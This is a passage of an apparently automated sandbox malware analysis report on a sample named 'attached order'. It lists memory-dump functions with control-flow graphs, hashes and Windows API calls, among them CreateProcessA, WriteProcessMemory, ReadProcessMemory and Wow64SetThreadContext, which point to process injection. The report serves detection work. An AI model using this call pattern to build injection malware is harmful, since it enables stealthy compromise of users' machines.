                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: a3016bd8c60e21d4081ac60862dc2c96c72b33029c44a5f11ad9ce199910e985
                                                                                          • Instruction ID: be0e3b6899b63374db57a139e19c19b4caaf3445ddd24f0469780bbc63668c9b
                                                                                          • Opcode Fuzzy Hash: a3016bd8c60e21d4081ac60862dc2c96c72b33029c44a5f11ad9ce199910e985
                                                                                          • Instruction Fuzzy Hash: 705144B09013498FDB44DFAAD889BDEBBF1BF88314F208459E019A7390DB745984CF65
                                                                                          Function 09E58440 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 99 9e58440-9e58465 call 9e55edc 102 9e58467-9e58477 99->102 103 9e5847a-9e5850c CreateIconFromResourceEx 99->103 106 9e58515-9e58532 103->106 107 9e5850e-9e58514 103->107 107->106
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFromIconResource
                                                                                          • String ID: eU
                                                                                          • API String ID: 3668623891-19612409
                                                                                          • Opcode ID: 95dec2a00cb363551b7314e6637c8671078f956d479828e0ee705b59bf3df9a9
                                                                                          • Instruction ID: 844b6a1399ab654d63b8fc09ef1289e4178c102d18203bf69240a353bd9242d6
                                                                                          • Opcode Fuzzy Hash: 95dec2a00cb363551b7314e6637c8671078f956d479828e0ee705b59bf3df9a9
                                                                                          • Instruction Fuzzy Hash: 1A3178729003889FCB01DFA9C840AEEBFF8EF09310F14845AE955A7251C335D954DFA1
                                                                                          Function 0BA7D91F Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 166 ba7d91f-ba7ddb2 170 ba7ddbd-ba7ddd5 166->170
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Y0$<W0
                                                                                          • API String ID: 0-4290105809
                                                                                          • Opcode ID: a8af3dce6d02abb2f48db91fbba12ea168c532e719c4d8482a53f7ec9e933f3e
                                                                                          • Instruction ID: cce345885f73d44a97fa28c062d9da3996e5423e23943d95514898a424312490
                                                                                          • Opcode Fuzzy Hash: a8af3dce6d02abb2f48db91fbba12ea168c532e719c4d8482a53f7ec9e933f3e
                                                                                          • Instruction Fuzzy Hash: 00F06D74646209CFDB90AB18DC74F983BBAFF85601F10C5A9D01D8B254EA304D45CF14
                                                                                          Function 0A320D2F Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 652 a320d2f-a320dcd 655 a320e06-a320e26 652->655 656 a320dcf-a320dd9 652->656 663 a320e28-a320e32 655->663 664 a320e5f-a320e8e 655->664 656->655 657 a320ddb-a320ddd 656->657 658 a320e00-a320e03 657->658 659 a320ddf-a320de9 657->659 658->655 661 a320deb 659->661 662 a320ded-a320dfc 659->662 661->662 662->662 665 a320dfe 662->665 663->664 666 a320e34-a320e36 663->666 672 a320e90-a320e9a 664->672 673 a320ec7-a320f81 CreateProcessA 664->673 665->658 667 a320e38-a320e42 666->667 668 a320e59-a320e5c 666->668 670 a320e46-a320e55 667->670 671 a320e44 667->671 668->664 670->670 674 a320e57 670->674 671->670 672->673 675 a320e9c-a320e9e 672->675 684 a320f83-a320f89 673->684 685 a320f8a-a321010 673->685 674->668 677 a320ea0-a320eaa 675->677 678 a320ec1-a320ec4 675->678 679 a320eae-a320ebd 677->679 680 a320eac 677->680 678->673 679->679 682 a320ebf 679->682 680->679 682->678 684->685 695 a321012-a321016 685->695 696 a321020-a321024 685->696 695->696 697 a321018 695->697 698 a321026-a32102a 696->698 699 a321034-a321038 696->699 697->696 698->699 702 a32102c 698->702 700 a32103a-a32103e 699->700 701 a321048-a32104c 699->701 700->701 703 a321040 700->703 704 a32105e-a321065 701->704 705 a32104e-a321054 701->705 702->699 703->701 706 a321067-a321076 704->706 707 a32107c 704->707 705->704 706->707 709 a32107d 707->709 709->709
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A320F6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: fbe2ec69d88907618594cf19ee84cd8ab3fbca08990977d4ff64f36918feed3f
                                                                                          • Instruction ID: 98b6001244340689ac0c1ea09bdeddbee6fac04f6413d1b2d5a25b5a65ee0062
                                                                                          • Opcode Fuzzy Hash: fbe2ec69d88907618594cf19ee84cd8ab3fbca08990977d4ff64f36918feed3f
                                                                                          • Instruction Fuzzy Hash: 71A19C71D00669CFEB14CF68C881BEEBBB2BF49310F1485A9E849B7240DB749985CF91
                                                                                          Function 0A320D38 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 710 a320d38-a320dcd 712 a320e06-a320e26 710->712 713 a320dcf-a320dd9 710->713 720 a320e28-a320e32 712->720 721 a320e5f-a320e8e 712->721 713->712 714 a320ddb-a320ddd 713->714 715 a320e00-a320e03 714->715 716 a320ddf-a320de9 714->716 715->712 718 a320deb 716->718 719 a320ded-a320dfc 716->719 718->719 719->719 722 a320dfe 719->722 720->721 723 a320e34-a320e36 720->723 729 a320e90-a320e9a 721->729 730 a320ec7-a320f81 CreateProcessA 721->730 722->715 724 a320e38-a320e42 723->724 725 a320e59-a320e5c 723->725 727 a320e46-a320e55 724->727 728 a320e44 724->728 725->721 727->727 731 a320e57 727->731 728->727 729->730 732 a320e9c-a320e9e 729->732 741 a320f83-a320f89 730->741 742 a320f8a-a321010 730->742 731->725 734 a320ea0-a320eaa 732->734 735 a320ec1-a320ec4 732->735 736 a320eae-a320ebd 734->736 737 a320eac 734->737 735->730 736->736 739 a320ebf 736->739 737->736 739->735 741->742 752 a321012-a321016 742->752 753 a321020-a321024 742->753 752->753 754 a321018 752->754 755 a321026-a32102a 753->755 756 a321034-a321038 753->756 754->753 755->756 759 a32102c 755->759 757 a32103a-a32103e 756->757 758 a321048-a32104c 756->758 757->758 760 a321040 757->760 761 a32105e-a321065 758->761 762 a32104e-a321054 758->762 759->756 760->758 763 a321067-a321076 761->763 764 a32107c 761->764 762->761 763->764 766 a32107d 764->766 766->766
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A320F6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: f1ffd6f37e39d0a6a4c77c809beeb410edf15937369ea17a6e22bc800c6dd5fe
                                                                                          • Instruction ID: 195fc09acc3e78385591f00ec02906167c103d90d678563fd0349878a8261ca4
                                                                                          • Opcode Fuzzy Hash: f1ffd6f37e39d0a6a4c77c809beeb410edf15937369ea17a6e22bc800c6dd5fe
                                                                                          • Instruction Fuzzy Hash: 2B917C71D00669CFEB14CF68C981BDDBBB2BF49310F1585A9E809A7240DB749985CF91
                                                                                          Function 05A30A48 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 767 5a30a48-5a30a57 768 5a30a83-5a30a87 767->768 769 5a30a59 767->769 770 5a30a9b-5a30adc 768->770 771 5a30a89-5a30a93 768->771 826 5a30a5f call 5a30c38 769->826 827 5a30a5f call 5a30a48 769->827 777 5a30ae9-5a30af7 770->777 778 5a30ade-5a30ae6 770->778 771->770 772 5a30a64-5a30a66 775 5a30a68 772->775 776 5a30a7c 772->776 824 5a30a6e call 5a30ce0 775->824 825 5a30a6e call 5a30cd0 775->825 776->768 779 5a30b1b-5a30b1d 777->779 780 5a30af9-5a30afe 777->780 778->777 782 5a30b20-5a30b27 779->782 783 5a30b00-5a30b07 call 5a3042c 780->783 784 5a30b09 780->784 781 5a30a74-5a30a76 781->776 785 5a30bb8-5a30bd1 781->785 786 5a30b34-5a30b3b 782->786 787 5a30b29-5a30b31 782->787 789 5a30b0b-5a30b19 783->789 784->789 799 5a30bd4-5a30c30 785->799 790 5a30b48-5a30b51 call 5a3043c 786->790 791 5a30b3d-5a30b45 786->791 787->786 789->782 797 5a30b53-5a30b5b 790->797 798 5a30b5e-5a30b63 790->798 791->790 797->798 800 5a30b81-5a30b85 798->800 801 5a30b65-5a30b6c 798->801 817 5a30c32-5a30c78 799->817 804 5a30b8b-5a30b8e 800->804 801->800 802 5a30b6e-5a30b7e call 5a3044c call 5a3045c 801->802 802->800 806 5a30bb1-5a30bb7 804->806 807 5a30b90-5a30bae 804->807 807->806 819 5a30c80-5a30cab GetModuleHandleW 817->819 820 5a30c7a-5a30c7d 817->820 821 5a30cb4-5a30cc8 819->821 822 5a30cad-5a30cb3 819->822 820->819 822->821 824->781 825->781 826->772 827->772
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 05A30C9E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: dc9a698e2fed4f604e1c66b7f88be9e84369bbc7ad848732e355756c380c6da6
                                                                                          • Instruction ID: 5ce5020813fa9135345e44d43bc8ded53b39b7471de61199a1a95d33a448bfe0
                                                                                          • Opcode Fuzzy Hash: dc9a698e2fed4f604e1c66b7f88be9e84369bbc7ad848732e355756c380c6da6
                                                                                          • Instruction Fuzzy Hash: E1714570A00B058FD724CF6AD45AB6ABBF6FF48308F00892DE49AD7A40D734E905CB90
                                                                                          Function 05A37484 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 828 5a37484-5a374f6 831 5a37501-5a37508 828->831 832 5a374f8-5a374fe 828->832 833 5a37513-5a3754b 831->833 834 5a3750a-5a37510 831->834 832->831 835 5a37553-5a375b2 CreateWindowExW 833->835 834->833 836 5a375b4-5a375ba 835->836 837 5a375bb-5a375f3 835->837 836->837 841 5a37600 837->841 842 5a375f5-5a375f8 837->842 843 5a37601 841->843 842->841 843->843
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A375A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: 1af9a4e6beeeb09535f414dd9241e89c3cacdf5dbfbc5edfbe5b02c4a7d42cf3
                                                                                          • Instruction ID: b3c6fcfa1cc6cd3a5c5cc2ab8590ddb511fbd652b8b37671372fdb1847e72829
                                                                                          • Opcode Fuzzy Hash: 1af9a4e6beeeb09535f414dd9241e89c3cacdf5dbfbc5edfbe5b02c4a7d42cf3
                                                                                          • Instruction Fuzzy Hash: C451BDB1D00249AFDF14CFAAC984ADEBBB5FF48314F25812AE819AB250D7709945CF90
                                                                                          Function 05A37490 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 844 5a37490-5a374f6 845 5a37501-5a37508 844->845 846 5a374f8-5a374fe 844->846 847 5a37513-5a375b2 CreateWindowExW 845->847 848 5a3750a-5a37510 845->848 846->845 850 5a375b4-5a375ba 847->850 851 5a375bb-5a375f3 847->851 848->847 850->851 855 5a37600 851->855 856 5a375f5-5a375f8 851->856 857 5a37601 855->857 856->855 857->857
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A375A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: 30bbbca96ba8eac03935dde9b944404aee2b19b9f06cc199c60f7ee8cb92409c
                                                                                          • Instruction ID: 8c0528f16d069b3f11a47e76bf8c29be991681794d8d9baf1e9a50ad21ed0e37
                                                                                          • Opcode Fuzzy Hash: 30bbbca96ba8eac03935dde9b944404aee2b19b9f06cc199c60f7ee8cb92409c
                                                                                          • Instruction Fuzzy Hash: AA41ADB1D003499FDF14CF9AC884ADEBBB5FF48314F64812AE819AB250D775A945CF90
                                                                                          Function 05A36394 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 05A39B21
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallProcWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2714655100-0
                                                                                          • Opcode ID: 65dcabde15e02bbec5a91cd1d5c43d2cfb18505975849fda6dfeb3c0aeffc5e6
                                                                                          • Instruction ID: 82dd03cc52ae3ecb78129d5338bc163fa4852a4f893970018e9d3a565551616a
                                                                                          • Opcode Fuzzy Hash: 65dcabde15e02bbec5a91cd1d5c43d2cfb18505975849fda6dfeb3c0aeffc5e6
                                                                                          • Instruction Fuzzy Hash: B8411AB5A003098FCB14CF99C489EABBBF5FB88318F258459E519A7361D774A841CFA0
                                                                                          Function 01ABB3AD Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 01ABB469
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          • Opcode ID: 8782c488b9cd78a4a3ec76399d0b7452d8f87538d880d5dcba927ff8d5ba43a4
                                                                                          • Instruction ID: 72f67d60ca24209ec596215f4bcce557c086095941054c75a620ae660213e0ac
                                                                                          • Opcode Fuzzy Hash: 8782c488b9cd78a4a3ec76399d0b7452d8f87538d880d5dcba927ff8d5ba43a4
                                                                                          • Instruction Fuzzy Hash: 1E41B0B1C00759CFDB24CFA9C8847DDBBB5BF48304F64816AD409AB252D7B55945CFA0
                                                                                          Function 01AB9F74 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 01ABB469
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          • Opcode ID: c50f11dc211633b630d3579dbc56ec5da4bdd1ea011454f796af1396208ef519
                                                                                          • Instruction ID: 458a6157700ab61953281908f0bc20ddf471b6282987aab162b8a67247d01360
                                                                                          • Opcode Fuzzy Hash: c50f11dc211633b630d3579dbc56ec5da4bdd1ea011454f796af1396208ef519
                                                                                          • Instruction Fuzzy Hash: 0541BFB1C0075CCBDB24CFA9C884BDEBBB5BF49304F64806AD509AB252D7B56945CFA0
                                                                                          Function 09E571D0 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 09E5726F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: DrawText
                                                                                          • String ID:
                                                                                          • API String ID: 2175133113-0
                                                                                          • Opcode ID: c4330e737490d396e2ff5bf9e0e32c56c8b2fd50d2da5406fb59091e60c70d70
                                                                                          • Instruction ID: 083f6987152c58c754bd969d26af01e4c3c715959fef8af9a292485f62ff5544
                                                                                          • Opcode Fuzzy Hash: c4330e737490d396e2ff5bf9e0e32c56c8b2fd50d2da5406fb59091e60c70d70
                                                                                          • Instruction Fuzzy Hash: DC31D1B5D012099FCB14CF9AD8846EEFBF5FF58314F24842AE819A7210D375A954CFA0
                                                                                          Function 09E571D8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 09E5726F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: DrawText
                                                                                          • String ID:
                                                                                          • API String ID: 2175133113-0
                                                                                          • Opcode ID: e8c641c784ff21195a1d9b5b877cacfee9d54447b6d3c58ae46c587f6cfe2137
                                                                                          • Instruction ID: e90a06bb8c8b853bf86c40ec5c8530c37bc1f2a7bdb68751d760551ff68a5926
                                                                                          • Opcode Fuzzy Hash: e8c641c784ff21195a1d9b5b877cacfee9d54447b6d3c58ae46c587f6cfe2137
                                                                                          • Instruction Fuzzy Hash: 1A21C0B5D013499FCB10CF9AD884A9EFBF5BB58324F24842AE819A7310D375A954CFA0
                                                                                          Function 0A320AB0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A320B40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: bdb2e3b610372cd23a3e439b7073cab86c33773a52907c94523759ce09933d15
                                                                                          • Instruction ID: 91933b6fd4863cec8d834ca33cf75c5024213684a48fe2a0fee40ec06ed99fc7
                                                                                          • Opcode Fuzzy Hash: bdb2e3b610372cd23a3e439b7073cab86c33773a52907c94523759ce09933d15
                                                                                          • Instruction Fuzzy Hash: 2E2155B29003499FCB10CFAAC880BDEBBF5FF48314F10842AE918A7240C7789944CFA4
                                                                                          Function 0A320AAB Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A320B40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 149d8aefc35084977c9879ceb61c17fc16210a715e80bad2a9fa90befa2c6fa4
                                                                                          • Instruction ID: 64da35516fa50d9468b7546e56845f38b8d47f2642be250988cc956231181c5c
                                                                                          • Opcode Fuzzy Hash: 149d8aefc35084977c9879ceb61c17fc16210a715e80bad2a9fa90befa2c6fa4
                                                                                          • Instruction Fuzzy Hash: 9B2157719003498FCB14CFA9C8807EEBBF1FF88314F10842AE959A7240C7789954DF64
                                                                                          Function 0A320B98 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A320C20
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          • Opcode ID: cebdfe510cae8dc750b8f952e3c997000d27da530204ebc259f3e68e47d2c1d1
                                                                                          • Instruction ID: 37844beeb6d6f4258bd00664d85f61e0dfdfb9cf066c182c53b5096300e8ffc4
                                                                                          • Opcode Fuzzy Hash: cebdfe510cae8dc750b8f952e3c997000d27da530204ebc259f3e68e47d2c1d1
                                                                                          • Instruction Fuzzy Hash: 8E2157B18003599FCB10DFAAD880ADEFBF4BF48310F10882AE518A7241D7789944CF64
                                                                                          Function 0A320910 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A320996
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: a8213f496bb5b9dc86b59a4743cfc48f8bf7b35b1c59db6a68882cf92cf72cfb
                                                                                          • Instruction ID: b4d8a2d1463503d4d320d291e5a9906518a09e4864c79b6263f48682cff06295
                                                                                          • Opcode Fuzzy Hash: a8213f496bb5b9dc86b59a4743cfc48f8bf7b35b1c59db6a68882cf92cf72cfb
                                                                                          • Instruction Fuzzy Hash: A42157B29003098FDB14DFAAC4847EEFBF4AF48320F15842AD459B7240D7789944CFA5
                                                                                          Function 0A320BA0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A320C20
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          • Opcode ID: e63b4a827ca8b581241ba52049292cada1ad98edf286f42e0968d60539aec4a2
                                                                                          • Instruction ID: a6c67f2e2a512dc100e04ac83d7dbec3932d16758dcc96cc1669cbd78378f24c
                                                                                          • Opcode Fuzzy Hash: e63b4a827ca8b581241ba52049292cada1ad98edf286f42e0968d60539aec4a2
                                                                                          • Instruction Fuzzy Hash: 672125B1C003599FCB10DFAAC880AEEFBF5FF48310F51882AE519A7240D7789944DBA4
                                                                                          Function 0A320918 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A320996
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 822eda8a84e8527563920aa81f93cd07be3bc96aaaac99ac06436ff0e633a911
                                                                                          • Instruction ID: 7aa605ec24722d225b59d5289dddeaa14b91312e5b3ed626658906036d45f370
                                                                                          • Opcode Fuzzy Hash: 822eda8a84e8527563920aa81f93cd07be3bc96aaaac99ac06436ff0e633a911
                                                                                          • Instruction Fuzzy Hash: DC2104B29003098FDB54DFAAC4847EEBBF4AF48324F55842AD459B7240D778A944CFA5
                                                                                          Function 05A32F20 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05A32FA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 321478d766a7ab2c327cf2cc1b013682385ebc33d098a2976b6ffbcfe6d665bc
                                                                                          • Instruction ID: 1fb5248199df667330bc02f15c3d9e88cc4960cfa32b671b80335015f9a9a786
                                                                                          • Opcode Fuzzy Hash: 321478d766a7ab2c327cf2cc1b013682385ebc33d098a2976b6ffbcfe6d665bc
                                                                                          • Instruction Fuzzy Hash: BB21B3B59002489FDB10CF9AD984ADEFBF9FB48314F14841AE914A3350D374A954CF65
                                                                                          Function 05A32F19 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05A32FA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: ae09b86a026fa68905168ea3bd51a11f321db16e0fbe5c4dbe8ac735e61e6de0
                                                                                          • Instruction ID: 727bd01f0431fd27a9af87e4cf9a3f37815db77efffb093f1470ddd23c934952
                                                                                          • Opcode Fuzzy Hash: ae09b86a026fa68905168ea3bd51a11f321db16e0fbe5c4dbe8ac735e61e6de0
                                                                                          • Instruction Fuzzy Hash: 6A21E3B59002489FDB10CF9AD984ADEFBF5FB48314F15842AE914A7350D374A954CF64
                                                                                          Function 01ABDD64 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindWindowW.USER32(00000000,00000000), ref: 01ABF53E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
